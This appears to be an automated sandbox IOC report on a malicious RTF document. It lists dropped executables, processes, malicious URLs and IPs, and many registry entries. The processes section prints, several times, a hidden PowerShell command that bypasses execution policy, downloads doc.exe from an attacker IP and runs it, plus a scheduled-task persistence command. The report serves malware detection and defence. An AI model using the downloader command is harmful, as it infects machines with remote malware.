IOC Report

loading gif

Files

File Path
Type
Category
Malicious
catalogue_2021_samples_list_revise_ol.doc
Rich Text Format data, unknown version
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
downloaded
malicious
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp2C00.tmp
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\doc.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\maBdogbw.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\160C60F1.png
370 sysV pure executable
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84C9F23E.wmf
Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{023FDC9E-1C42-46A7-9085-716C914A6086}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3F2A7B0C-5922-426F-95EB-087369317B68}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C6B73EA-9387-4E02-9B96-A36EA329C5C4}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\catalogue_2021_samples_list_revise_ol.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Sep 29 03:17:20 2021, length=548674, window=hide
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2- (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msk (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7T64VM0QKZYD09V16F0X.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AEIVZJ3XSV20N2BPRI8G.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KALU1MUBXB5ZLB042YQK.temp
data
dropped
clean
C:\Users\user\Desktop\~$talogue_2021_samples_list_revise_ol.doc
data
dropped
clean
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
malicious
C:\Users\user\AppData\Roaming\doc.exe
'C:\Users\user\AppData\Roaming\doc.exe'
malicious
C:\Windows\SysWOW64\schtasks.exe
'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
malicious
C:\Users\user\AppData\Roaming\doc.exe
C:\Users\user\AppData\Roaming\doc.exe
malicious
C:\Users\user\AppData\Roaming\doc.exe
C:\Users\user\AppData\Roaming\doc.exe
malicious
C:\Users\user\AppData\Roaming\doc.exe
C:\Users\user\AppData\Roaming\doc.exe
malicious
C:\Windows\System32\notepad.exe
'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
malicious
C:\Windows\System32\verclsid.exe
'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
clean
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
httP://13.92.1
unknown
malicious
http://13.92.100.208/doc/doc.exe
13.92.100.208
malicious
httP://13.92.100.208/doc/doc.exe
unknown
malicious
httP://13.92.100.208/do
unknown
malicious
httP://13.92.100
unknown
malicious
152.67.253.163
malicious
httP://13.92.100.208/doc/doc.exePE
unknown
malicious
httP://13.92.100.208/doc/doc.
unknown
malicious
http://www.piriform.com/ccleaner
unknown
clean
http://www.%s.comPA
unknown
clean
http://www.piriform.com/ccleanerhttp://www.piriform.com/
unknown
clean
http://13.92.100.208
unknown
clean
http://www.piriform.com/ccleanerhttp://www.piriform.coL
unknown
clean
https://github.com/syohex/java-simple-mine-sweeper
unknown
clean
There are 4 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
152.67.253.163
unknown
United States
malicious
13.92.100.20
unknown
United States
malicious
13.92.100.208
unknown
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPer1_0Server
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPerServer
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0f(
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
gg(
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
|h(
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-2000
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
GraphicsFiltersPNGFilesIntl_1033
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2FB9D
2FB9D
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
clean
